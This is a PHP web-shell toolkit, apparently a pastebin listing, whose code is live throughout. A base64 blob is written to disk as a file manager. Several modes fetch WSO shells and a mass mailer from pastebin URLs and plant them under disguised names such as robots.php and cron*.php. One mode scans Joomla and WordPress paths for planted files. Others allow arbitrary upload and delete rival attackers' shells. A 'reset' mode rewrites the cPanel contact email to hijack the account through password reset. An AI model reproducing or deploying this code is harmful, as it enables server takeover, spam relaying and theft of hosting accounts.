I9ImdyZWVuIj4nOwogICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPGZvbnQgY29sb3I9InJlZCI+JzsKICAgICAgICBlY2hvIHBlcm1zKCIkcGF0aC8kZGlyIik7CiAgICAgICAgaWYoaXNfd3JpdGFibGUoIiRwYXRoLyRkaXIiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRkaXIiKSkgZWNobyAnPC9mb250Pic7CiAgICAgICAgCiAgICAgICAgZWNobyAiPC9jZW50ZXI+PC90ZD4KICAgICAgICA8dGQ+PGNlbnRlcj48Zm9ybSBtZXRob2Q9XCJQT1NUXCIgYWN0aW9uPVwiP29wdGlvbiZwYXRoPSRwYXRoXCI+CiAgICAgICAgPHNlbGVjdCBuYW1lPVwib3B0XCI+CgkgICAgPG9wdGlvbiB2YWx1ZT1cIlwiPjwvb3B0aW9uPgogICAgICAgIDxvcHRpb24gdmFsdWU9XCJkZWxldGVcIj5EZWxldGU8L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwiY2htb2RcIj5DaG1vZDwvb3B0aW9uPgogICAgICAgIDxvcHRpb24gdmFsdWU9XCJyZW5hbWVcIj5SZW5hbWU8L29wdGlvbj4KICAgICAgICA8L3NlbGVjdD4KICAgICAgICA8aW5wdXQgdHlwZT1cImhpZGRlblwiIG5hbWU9XCJ0eXBlXCIgdmFsdWU9XCJkaXJcIj4KICAgICAgICA8aW5wdXQgdHlwZT1cImhpZGRlblwiIG5hbWU9XCJuYW1lXCIgdmFsdWU9XCIkZGlyXCI+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwicGF0aFwiIHZhbHVlPVwiJHBhdGgvJGRpclwiPgogICAgICAgIDxpbnB1dCB0eXBlPVwic3VibWl0XCIgdmFsdWU9XCI+XCIgLz4KICAgICAgICA8L2Zvcm0+PC9jZW50ZXI+PC90ZD4KICAgICAgICA8L3RyPiI7CiAgICB9CiAgICBlY2hvICc8dHIgY2xhc3M9ImZpcnN0Ij48dGQ+PC90ZD48dGQ+PC90ZD48dGQ+PC90ZD48dGQ+PC90ZD48L3RyPic7CiAgICBmb3JlYWNoKCRzY2FuZGlyIGFzICRmaWxlKXsKICAgICAgICBpZighaXNfZmlsZSgiJHBhdGgvJGZpbGUiKSkgY29udGludWU7CiAgICAgICAgJHNpemUgPSBmaWxlc2l6ZSgiJHBhdGgvJGZpbGUiKS8xMDI0OwogICAgICAgICRzaXplID0gcm91bmQoJHNpemUsMyk7CiAgICAgICAgaWYoJHNpemUgPj0gMTAyNCl7CiAgICAgICAgICAgICRzaXplID0gcm91bmQoJHNpemUvMTAyNCwyKS4nIE1CJzsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgJHNpemUgPSAkc2l6ZS4nIEtCJzsKICAgICAgICB9CgogICAgICAgIGVjaG8gIjx0cj4KICAgICAgICA8dGQ+PGEgaHJlZj1cIj9maWxlc3JjPSRwYXRoLyRmaWxlJnBhdGg9JHBhdGhcIj4kZmlsZTwvYT48L3RkPgogICAgICAgIDx0ZD48Y2VudGVyPiIuJHNpemUuIjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+IjsKICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSkgZWNobyAnPGZvbnQgY29sb3I9ImdyZWVuIj4nOwogICAgICAgIGVsc2VpZighaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzxmb250IGNvbG9yPSJyZWQiPic7CiAgICAgICAgZWNobyBwZXJtcygiJHBhdGgvJGZpbGUiKTsKICAgICAgICBpZihpc193cml0YWJsZSgiJHBhdGgvJGZpbGUiKSB8fCAhaXNfcmVhZGFibGUoIiRwYXRoLyRmaWxlIikpIGVjaG8gJzwvZm9udD4nOwogICAgICAgIGVjaG8gIjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPHRkPjxjZW50ZXI+PGZvcm0gbWV0aG9kPVwiUE9TVFwiIGFjdGlvbj1cIj9vcHRpb24mcGF0aD0kcGF0aFwiPgogICAgICAgIDxzZWxlY3QgbmFtZT1cIm9wdFwiPgoJICAgIDxvcHRpb24gdmFsdWU9XCJcIj48L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwiZGVsZXRlXCI+RGVsZXRlPC9vcHRpb24+CiAgICAgICAgPG9wdGlvbiB2YWx1ZT1cImNobW9kXCI+Q2htb2Q8L29wdGlvbj4KICAgICAgICA8b3B0aW9uIHZhbHVlPVwicmVuYW1lXCI+UmVuYW1lPC9vcHRpb24+CiAgICAgICAgPG9wdGlvbiB2YWx1ZT1cImVkaXRcIj5FZGl0PC9vcHRpb24+CiAgICAgICAgPC9zZWxlY3Q+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwidHlwZVwiIHZhbHVlPVwiZmlsZVwiPgogICAgICAgIDxpbnB1dCB0eXBlPVwiaGlkZGVuXCIgbmFtZT1cIm5hbWVcIiB2YWx1ZT1cIiRmaWxlXCI+CiAgICAgICAgPGlucHV0IHR5cGU9XCJoaWRkZW5cIiBuYW1lPVwicGF0aFwiIHZhbHVlPVwiJHBhdGgvJGZpbGVcIj4KICAgICAgICA8aW5wdXQgdHlwZT1cInN1Ym1pdFwiIHZhbHVlPVwiPlwiIC8+CiAgICAgICAgPC9mb3JtPjwvY2VudGVyPjwvdGQ+CiAgICAgICAgPC90cj4iOwogICAgfQogICAgZWNobyAnPC90YWJsZT4KICAgIDwvZGl2Pic7Cn0KZWNobyAnPGJyLz4KPC9CT0RZPgo8L0hUTUw+JzsKZnVuY3Rpb24gcGVybXMoJGZpbGUpewogICAgJHBlcm1zID0gZmlsZXBlcm1zKCRmaWxlKTsKCmlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApIHsKICAgIC8vIFNvY2tldAogICAgJGluZm8gPSAncyc7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHhBMDAwKSA9PSAweEEwMDApIHsKICAgIC8vIFN5bWJvbGljIExpbmsKICAgICRpbmZvID0gJ2wnOwp9IGVsc2VpZiAoKCRwZXJtcyAmIDB4ODAwMCkgPT0gMHg4MDAwKSB7CiAgICAvLyBSZWd1bGFyCiAgICAkaW5mbyA9ICctJzsKfSBlbHNlaWYgKCgkcGVybXMgJiAweDYwMDApID09IDB4NjAwMCkgewogICAgLy8gQmxvY2sgc3BlY2lhbAogICAgJGluZm8gPSAnYic7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHg0MDAwKSA9PSAweDQwMDApIHsKICAgIC8vIERpcmVjdG9yeQogICAgJGluZm8gPSAnZCc7Cn0gZWxzZWlmICgoJHBlcm1zICYgMHgyMDAwKSA9PSAweDIwMDApIHsKICAgIC8vIENoYXJhY3RlciBzcGVjaWFsCiAgICAkaW5mbyA9ICdjJzsKfSBlbHNlaWYgKCgkcGVybXMgJiAweDEwMDApID09IDB4MTAwMCkgewogICAgLy8gRklGTyBwaXBlCiAgICAkaW5mbyA9ICdwJzsKfSBlbHNlIHsKICAgIC8vIFVua25vd24KICAgICRpbmZvID0gJ3UnOwp9CgovLyBPd25lcgokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDEwMCkgPyAncicgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA4MCkgPyAndycgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA0MCkgPwogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDgwMCkgPyAncycgOiAneCcgKSA6CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwODAwKSA/ICdTJyA6ICctJykpOwoKLy8gR3JvdXAKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMjApID8gJ3InIDogJy0nKTsKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMTApID8gJ3cnIDogJy0nKTsKJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDgpID8KICAgICAgICAgICAgKCgkcGVybXMgJiAweDA0MDApID8gJ3MnIDogJ3gnICkgOgogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDQwMCkgPyAnUycgOiAnLScpKTsKCi8vIFdvcmxkCiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDA0KSA/ICdyJyA6ICctJyk7CiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAyKSA/ICd3JyA6ICctJyk7CiRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAxKSA/CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwMjAwKSA/ICd0JyA6ICd4JyApIDoKICAgICAgICAgICAgKCgkcGVybXMgJiAweDAyMDApID8gJ1QnIDogJy0nKSk7CgogICAgcmV0dXJuICRpbmZvOwp9Cj8+');
  322. $save=fopen('lite.php','w');
  323. fwrite($save,$al7wa);
  324. fclose($save);
  325. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$url/lite.php"." target="."_blank".">www.$azzouz/lite.php"."</a><br>";
  326. }
  327. ////////////
  328. if(isset($_GET['ls'])){
  329. $gg= $_GET["ls"];
  330. if(eregi("array",$gg)){$namex = 'array';
  331. }
  332. else{$namex = 'ch';
  333. }
  334. $dexter = dirname($_SERVER["PHP_SELF"]); $dirname = "__/$dexter";
  335. $dgh=str_replace(array("__/////","__////","__///","__//","__/"), "",$dirname);
  336. echo "
  337. <center>
  338. <br>
  339. <form style='margin-top: -140px;'method='POST'>
  340. <textarea style='width: 400px;height: 300px;margin: 0px;'placeholder='' name='config'>administrator
  341. components
  342. help
  343. includes
  344. language
  345. manifests
  346. modules
  347. plugins
  348. media
  349. templates
  350. cache
  351. cli
  352. components/com_foxcontact
  353. components/com_jce
  354. components/com_users
  355. components/com_wrapper
  356. components/com_xmap
  357. components/error_log
  358. libraries/cms
  359. libraries/joomla
  360. media/cms
  361. media/com_finder
  362. media/com_foxcontact
  363. media/contacts
  364. media/editors
  365. media/jce
  366. media/mailto
  367. media/media
  368. plugins/captcha
  369. plugins/content
  370. plugins/editors
  371. plugins/extension
  372. plugins/finder
  373. plugins/search
  374. plugins/system
  375. plugins/user
  376. templates/atomic
  377. templates/beez5
  378. wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader
  379. wp-content/plugins/woocommerce-products-filter/lib
  380. wp-content/plugins/woocommerce-products-filter
  381. wp-content/plugins
  382. wp-content/uploads
  383. wp-content/upgrade
  384. wp-content/languages
  385. wp-content/themes
  386. wp-content/mu-plugins
  387. wp-content
  388. public_html
  389. $dgh</textarea><br><br>
  390. <input type='submit' name='$namex' value='Submit'><br>
  391. </form>
  392. ";
  393. unlink('a.txt');
  394. unlink('php.txt');
  395. unlink('other.txt');
  396. unlink('f.txt');
  397. //---------------------------------------------------------------------
  398. $block = array ('view','system','cron','wp-multipart.php','king.php','endurance-browser-cache.php','submitticket.php','ssv3_directory.php','mk_conf.php','connect.php','config.txt.php','conf_global.php','endurance-page-cache.php','advanced-cache.php','endurance-browser-cache.php','wp-views.php','ls.php','users.php','configuration','application.php','defines.php','framework.php','menu.php','pathway.php','router.php','controller.php','foxcontact.php','wrapper.php','displayer.php','jce.php','xmap.php','factory.php','methods.php','useragent','offline','api','action.php','index.php','hello.php','akismet.php','aq_resizer.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config-sample.php','wp-config.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','error.php','platform.php','cms.php','import.php','loader.php','finder_indexer.php','garbagecron.php','update_cron.php','setup.php','output.php','ini.php','authorze.php','component.php');
  399. //---------------------------------------------------------------------
  400. if($_POST['array']){
  401. $haxor = $_POST['config'];
  402. $ex=explode("\r\n",$haxor);
  403. $total = count($ex);
  404. echo "<center>Total : <font color = 'red'>$total</font><br></center>";
  405. echo "<br><br><font color = 'blue'>array </font>(";
  406. foreach($ex as $sexter){
  407. echo "'";
  408. echo "<font color = 'red'>$sexter</font>";
  409. echo "',";
  410. }
  411. echo ");";
  412. }
  413. if($_POST['ch']){
  414. $haxor = $_POST['config'];
  415. $ex=explode("\r\n",$haxor);
  416. $total = count($ex);
  417. echo "<center>Total : <font color = 'red'>$total</font><br></center>";
  418. $dir=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../','../../../../../../../','../../../../../../../../');
  419. foreach($dir as $find){
  420. foreach($ex as $sexter){
  421. $p1 = $find.$sexter;
  422. if (file_exists("$p1")){
  423. $files1 = scandir($p1);
  424. foreach ($files1 as $file){
  425. $kingdom = $p1."/".$file;
  426. $site=str_replace(array("\\/","../","./","//","public_html/"), "",$kingdom);
  427. $filter = fopen("f.txt", 'a+');
  428. fwrite($filter, "$site\r\n");
  429. fclose($filter);
  430. }
  431. }
  432. }
  433. }
  434. $emails=@file_get_contents('f.txt');
  435. $ex = explode("\n",$emails);
  436. $count = count($ex);
  437. if(isset($emails)&&$count>=1){
  438. }
  439. else{
  440. echo "<br> List not correct <br>";
  441. exit;}
  442. echo "<br> [<font color = 'red'>$count</font>]&nbsp;";
  443. if(isset($emails)){
  444. for($i=0;$i<=$count;$i++){
  445. $d = strtolower($ex[$i]);
  446. if(strstr($d,".php")){
  447. $frr.=$d;
  448. $fr = $fr + 1;
  449. }
  450. else{
  451. $ather .=$d;
  452. $nn=$nn + 1;
  453. }
  454. }
  455. }
  456. if($fr){
  457. echo "[<font color = 'red'>$fr</font>]&nbsp;";
  458. $open=fopen("php.txt",'ab');
  459. fwrite($open,"$frr\r\n");
  460. fclose($open);
  461. }
  462. echo "[<font color = 'red'>$nn</font>]&nbsp;<br><br>";
  463. $open=fopen("other.txt",'ab');
  464. fwrite($open,"$ather\r\n");
  465. fclose($open);
  466. $getlist=@file_get_contents('php.txt');
  467. $ex=explode("\r",$getlist);
  468. $haxor = array_unique($ex);
  469. echo "<div style='font-size: 15px; line-height: 25px;'>";
  470. foreach ($haxor as $site){
  471. $regex = '('.implode($block, ')|(').')';
  472. if(eregi($regex,$site)){
  473. }
  474. else {
  475. $sa=fopen('a.txt','ab');
  476. fwrite($sa,"$site"."\r\n");
  477. fclose($sa);
  478. }
  479. }
  480. $sez = $_SERVER["SERVER_NAME"];
  481. $old=explode("\r\n",@file_get_contents('a.txt'));
  482. $ex_old = array_unique($old);
  483. $dexter = file_get_contents('a.txt');
  484. $total = count($old);
  485. $ggg= $_GET["ls"];
  486. if(eregi("url",$ggg)){
  487. echo"<center>
  488. <table style='width: 30%'>
  489. <tr>
  490. <td><center><?echo $nt;?></center><textarea name='othersx' cols='30' rows='10' style='width: 400px;height: 180px;margin: 0px;'>";
  491. foreach ($ex_old as $site){
  492. echo "$sez/$site\r\n";
  493. }
  494. echo"</textarea></td>
  495. </tr>
  496. </table>
  497. </center>";
  498. echo "<br><center>Total : <font color = 'red'>$total</font><br></center>";
  499. }
  500. else {
  501. echo"<center>
  502. <table style='width: 30%'>
  503. <tr>
  504. <td><center><?echo $nt;?></center><textarea name='othersx' cols='30' rows='10' style='width: 400px;height: 180px;margin: 0px;'>
  505. $dexter
  506. </textarea></td>
  507. </tr>
  508. </table>
  509. </center>";
  510. echo "<br><center>Total : <font color = 'red'>$total</font><br></center>";
  511. }
  512. foreach ($ex_old as $site){
  513. echo "<br><a href='http://$sez/$site' target='_blank' style='text-decoration: blink;'>$sez/$site</a>";
  514. }
  515. echo "</div>";
  516. }
  517. echo'</center>';
  518. }
  519. //////////////
  520. if(isset($_GET["random"])){
  521. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  522. foreach($sss as $pa){
  523. $p1=array("$pa/cli/");
  524. foreach($p1 as $path){
  525. if (file_exists("$path")){
  526. $print = $path."cron".rand(999, 123).".php";
  527. $html = @file_get_contents('https://pastebin.com/raw/jWBjgLd2'); //Mailer
  528. $save=fopen($print,'w');
  529. fwrite($save,$html);
  530. $print = "__$print";
  531. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  532. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  533. break;
  534. }
  535. $p2=array("$pa/includes/");
  536. foreach($p2 as $path){
  537. if (file_exists("$path")){
  538. $print = $path."cron".rand(999, 123).".php";
  539. $html = @file_get_contents('https://pastebin.com/raw/jWBjgLd2'); //Mailer
  540. $save=fopen($print,'w');
  541. fwrite($save,$html);
  542. $print = "__$print";
  543. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  544. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print?pass=ransomware"." target="."_blank".">$azzouz/$print"."</a><br>";
  545. }}
  546. }
  547. //////
  548. $p3=array("$pa/plugins/user/");
  549. foreach($p3 as $path){
  550. if (file_exists("$path")){
  551. $print = $path."system".rand(999, 123).".php";
  552. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA'); // WSO v2.6
  553. $save=fopen($print,'w');
  554. fwrite($save,$html);
  555. $print = "__$print";
  556. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  557. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  558. break;
  559. }
  560. $p4=array("$pa/plugins/");
  561. foreach($p4 as $path){
  562. if (file_exists("$path")){
  563. $print = $path."system".rand(999, 123).".php";
  564. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA'); // WSO v2.6
  565. $save=fopen($print,'w');
  566. fwrite($save,$html);
  567. $print = "__$print";
  568. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  569. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  570. }}
  571. }
  572. //////
  573. $p5=array("$pa/libraries/cms/");
  574. foreach($p5 as $path){
  575. if (file_exists("$path")){
  576. $print = $path."view".rand(999, 123).".php";
  577. $html = @file_get_contents('https://pastebin.com/raw/wL527WWg'); // WSO v2.5
  578. $save=fopen($print,'w');
  579. fwrite($save,$html);
  580. $print = "__$print";
  581. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  582. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  583. break;
  584. }
  585. $p6=array("$pa/libraries/");
  586. foreach($p6 as $path){
  587. if (file_exists("$path")){
  588. $print = $path."view".rand(999, 123).".php";
  589. $html = @file_get_contents('https://pastebin.com/raw/wL527WWg'); // WSO v2.5
  590. $save=fopen($print,'w');
  591. fwrite($save,$html);
  592. $print = "__$print";
  593. $print=str_replace(array("///","//","...","..","__...","__..","__.","__///","__//","__/"), "",$print);
  594. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/$print"." target="."_blank".">$azzouz/$print"."</a><br>";
  595. }}
  596. }
  597. }
  598. }
  599. if(isset($_GET["presta"])){
  600. $sss=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  601. foreach($sss as $pa){
  602. $p1=array("$pa/cache/");
  603. foreach($p1 as $path){
  604. if (file_exists("$path"))
  605. {
  606. /////////////////////////////////////
  607. $wtf1 = "$path"."authorze.php";
  608. $wtf2 = "$path"."setup.php";
  609. $wtf3 = "$path"."output.php";
  610. $wtf4 = "$path"."manager.php";
  611. /////////////////////////////////////
  612. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
  613. $save=fopen($wtf1,'w');
  614. fwrite($save,$html);
  615. //////////////////////////////////////
  616. $zz = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
  617. $gg=fopen($wtf2,'w');
  618. fwrite($gg,$zz);
  619. /////////////////////////////////////
  620. $zzt = @file_get_contents('https://pastebin.com/raw/wL527WWg');
  621. $ggt=fopen($wtf3,'w');
  622. fwrite($ggt,$zzt);
  623. /////////////////////////////////////
  624. $ert = $multipart;
  625. $fgh=fopen($wtf4,'w');
  626. fwrite($fgh,$ert);
  627. }}
  628. }
  629. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/manager.php"." target="."_blank".">www.$azzouz/cache/manager.php"."</a><br>";
  630. echo "----------------------------------------------------------------------------------------------------<br>";
  631. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/output.php"." target="."_blank".">www.$azzouz/cache/output.php"."</a><br>";
  632. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/authorze.php"." target="."_blank".">www.$azzouz/cache/authorze.php"."</a><br>";
  633. echo "<font style='color:#9c0000'>[!] </font><a style='color:#0a5d00'<a href="."http://$azzouz/cache/setup.php?pass=ransomware"." target="."_blank".">www.$azzouz/cache/setup.php"."</a><br>";
  634. echo "----------------------------------------------------------------------------------------------------<br>";
  635. }
  636. if(isset($_GET["dexter"]))
  637. {
  638. $html = @file_get_contents('https://pastebin.com/raw/nxJA9qiA');
  639. $setup = "htaccess.php";
  640. $set=fopen($setup,'w');
  641. fwrite($set,$html);
  642. $mailer = @file_get_contents('https://pastebin.com/raw/jWBjgLd2');
  643. $authorze = "pagebreak.php";
  644. $auth=fopen($authorze,'w');
  645. fwrite($auth,$mailer);
  646. $ghjk = @file_get_contents('https://pastebin.com/raw/wL527WWg');
  647. $uio = "robots.php";
  648. $cvb=fopen($uio,'w');
  649. fwrite($cvb,$ghjk);
  650. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/htaccess.php"." target="."_blank".">www.$url/htaccess.php"."</a><br>";
  651. echo "<font style='color:#9c0000'>[+] </font><a style='color:#5a3ab7' href="."http://$url/pagebreak.php?pass=ransomware"." target="."_blank".">www.$url/pagebreak.php"."</a><br>";
  652. echo "<font style='color:#9c0000'>[+] </font><a style='color:#0a5d00' href="."http://$url/robots.php"." target="."_blank".">www.$url/robots.php"."</a><br>";
  653. echo "----------------------------------------------------------------------------------------------------<br>";
  654. }
  655. if(isset($_GET["upload"]))
  656. {
  657. echo '<center><font color="Red" size="4">';
  658. /// Script Upload By dexter \\\
  659. if(isset($_POST['Submit'])){
  660. $filedir = "";
  661. $maxfile = '2000000';
  662. $mode = '0644';
  663. $userfile_name = $_FILES['image']['name'];
  664. $userfile_tmp = $_FILES['image']['tmp_name'];
  665. if(isset($_FILES['image']['name'])) {
  666. $qx = $filedir.$userfile_name;
  667. @move_uploaded_file($userfile_tmp, $qx);
  668. @chmod ($qx, octdec($mode));
  669. echo" <a href=$userfile_name><center><b>Sucess Upload $userfile_name</b></center></a>";
  670. }
  671. }
  672. else{
  673. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
  674. }
  675. echo '</center></font>';
  676. }
  677. if(isset($_GET["kill"]))
  678. {
  679. unlink('a.txt');
  680. unlink('php.txt');
  681. unlink('other.txt');
  682. unlink('f.txt');
  683. $azazaz=array("lite.php","cmd.php","remote.php","ls.php","mw.php","m.php","w.php","ww.php","baa.php","pr.php","check.php","index1.php","index2.php","shl.php","ex.php","exx.php","w.php","XMX.php","zaaz.php","k.php","etc.php","222.php","list.txt","leafpw.php","aminox.php","x","zeb.php","1.php","cgi.php","root.php","py.php","gat.php","leaf.php","masss.php","ox.php","tim.php","sh.php","tazz.php","up.php","abderahim-zamolix.php","emails.php","s.php","zaz.php","zeubda.php","K7.php","zabi.php","plugin.php","olux.php","Rebel.php","shell.php","wso.php","upload.php","mailer.php","phpleafmailer.php","wget.php","melex1.php","cvv.php","hous.zip","x.php","spam.php","indoxploit.php","config.php","1337w0rm.php","sym.php","bt.php","amine.php","mama.php","uploader.php","hous.php","ok.php");
  684. foreach($azazaz as $zamla){
  685. if (!unlink($zamla)) { echo ("");}
  686. $l97ba = "modules/$zamla";
  687. if (!unlink($l97ba)) { echo ("");}
  688. $l97ba = "../$zamla";
  689. if (!unlink($l97ba)) { echo ("");}
  690. $l97ba = "../../$zamla";
  691. if (!unlink($l97ba)) { echo ("");}
  692. $l97ba = "../modules/$zamla";
  693. if (!unlink($l97ba)) { echo ("");}
  694. $l97ba = "./$zamla";
  695. if (!unlink($l97ba)) { echo ("");}
  696. }
  697. $jj = basename($_SERVER['SCRIPT_NAME']);
  698. $az6 = "ms-authorze.zip";
  699. $az7 = "../../ms-authorze.zip";
  700. $az8 = "../../../../ms-authorze.zip";
  701. $az0 = "wp-multipart.php";
  702. $az1 = "../wp-multipart.php";
  703. $az2 = "../../wp-multipart.php";
  704. $az3 = "../../../wp-multipart.php";
  705. $az4 = "../../../../wp-multipart.php";
  706. $az5 = "../../../../../wp-multipart.php";
  707. $az00 = "cache/./multipart.php";
  708. $az9 = "cache/../multipart.php";
  709. $az10 = "cache/../../multipart.php";
  710. $az11 = "cache/../../../multipart.php";
  711. $az12 = "cache/../../../../multipart.php";
  712. if (!unlink($jj))
  713. {
  714. echo ("failed<br>");
  715. }else
  716. {
  717. echo ("Sucess<br>");
  718. }
  719. if (!unlink($az1)) { echo ("");}
  720. if (!unlink($az2)) { echo ("");}
  721. if (!unlink($az3)) { echo ("");}
  722. if (!unlink($az4)) { echo ("");}
  723. if (!unlink($az5)) { echo ("");}
  724. if (!unlink($az0)) { echo ("");}
  725. if (!unlink($az6)) { echo ("");}
  726. if (!unlink($az7)) { echo ("");}
  727. if (!unlink($az8)) { echo ("");}
  728. if (!unlink($az00)) { echo ("");}
  729. if (!unlink($az9)) { echo ("");}
  730. if (!unlink($az10)) { echo ("");}
  731. if (!unlink($az11)) { echo ("");}
  732. if (!unlink($az12)) { echo ("");}
  733. $rr=array('./','../','../../','../../../','../../../../','../../../../../','../../../../../../');
  734. foreach($rr as $tt){
  735. $uu=array("$tt/wp-admin/","$tt/wp-includes/","$tt/cache/");
  736. foreach($uu as $oo){
  737. if (file_exists("$oo"))
  738. {
  739. $s1 = "$oo"."ms-kzip.php";
  740. $s2 = "$oo"."ms-authorze.zip";
  741. $s3 = "$oo"."manager.php";
  742. $s4 = "$oo"."ms-authorze.zip";
  743. if (!unlink($s1)) { echo ("");}
  744. if (!unlink($s2)) { echo ("");}
  745. if (!unlink($s3)) { echo ("");}
  746. if (!unlink($s4)) { echo ("");}
  747. }}
  748. }
  749. }
  750. if(isset($_GET["reset"]))
  751. {
  752. $site = $_SERVER['HTTP_HOST'];
  753. $ips = getenv('REMOTE_ADDR');
  754. $filt = getcwd();
  755. $fuck = explode("/",$filt);
  756. $user = $fuck[2];
  757. $email = "dexterkh1212x@gmail.com";
  758. $wr = 'email:'.$email;
  759. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  760. fwrite($f, $wr);
  761. fclose($f);
  762. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  763. fwrite($f, $wr);
  764. fclose($f);
  765. $parm = $site.':2083/resetpass?start=1';
  766. echo "<br> $parm<br>";
  767. $parm = $ips.':2083/resetpass?start=1';
  768. echo "<br> $parm<br>";
  769. $toba = __file__;
  770. echo "<br> $toba<br>";
  771. }
Add Comment
Please, Sign In to add comment